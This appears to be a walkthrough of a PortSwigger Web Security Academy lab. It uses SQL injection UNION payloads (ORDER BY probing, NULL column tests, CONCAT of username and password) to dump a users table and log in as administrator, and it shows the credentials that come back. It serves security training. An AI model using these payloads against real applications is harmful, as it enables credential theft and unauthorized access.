This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called `users`, with columns called `username` and `password`.

To solve the lab, perform an [SQL injection UNION](https://portswigger.net/web-security/sql-injection/union-attacks) attack that retrieves all usernames and passwords, and use the information to log in as the `administrator` user.

# Practical
Let's determine how the app function first.
Clicking on a category takes us there and returns a URL:
```html
https://ac651fa01e33fabd80ca37a8000600ad.web-security-academy.net/filter?category=Gifts
```
And we can click on a product to see it's details returning this URL:
```html
https://ac651fa01e33fabd80ca37a8000600ad.web-security-academy.net/product?productId=5
```
So that's all possible let's test each one for a vulnerability.
And like the previous labs. Only the category parameter is vulnerable to SQL injection.
```html
https://ac651fa01e33fabd80ca37a8000600ad.web-security-academy.net/filter?category='
```
We're performing an UNION attack so let's determine the number of columns and datatype.

We'll be using the same two methods.
Using ORDER BY -- payload it breaks at 3.
```sql
' ORDER BY 3--
```
Let's try the other method.
```sql
' UNION SELECT NULL,NULL,NULL--
```
And 3 breaks while 2 works fine.
Let's determine if both of the columns are strings.
```sql
' UNION SELECT 'a',NULL--
```
This breaks the site so the first column isn't a string.
How about the other position?
```sql
' UNION SELECT NULL,'b'--
```
Okay so let's craft our payload
```sql
' UNION SELECT username,password FROM users--
```
This returns an error since username isn't a string. The username and password are both in the same column.
```sql
' UNION SELECT NULL,password FROM users--
```
This will return all the passwords but we don't whose password is this. This is not ideal since if there's is a lot of passwords, it'll be hard to determine which is whose.
So let's try doing some CONCAT.
Searching up SQL CONCAT, I found something on w3schools and I started crafting my payload.
```sql
SELECT  CONCAT('SQL', ' is', ' fun!');
```
Let's implement this in our payload.
```sql
' UNION SELECT NULL,CONCAT(username,'~',password) FROM users--
```
The **~** will be our separator and it doesn't matter if you select passwords or username first. Let's send it.
```txt
administrator~o0g3d2lv25ly80cr9r1k

wiener~1gsnhyk0tuumu7jy4mt9

carlos~lxieel7y0nrzprk2ld59
```
Now we know which is which. Let's solve the lab by logging in.
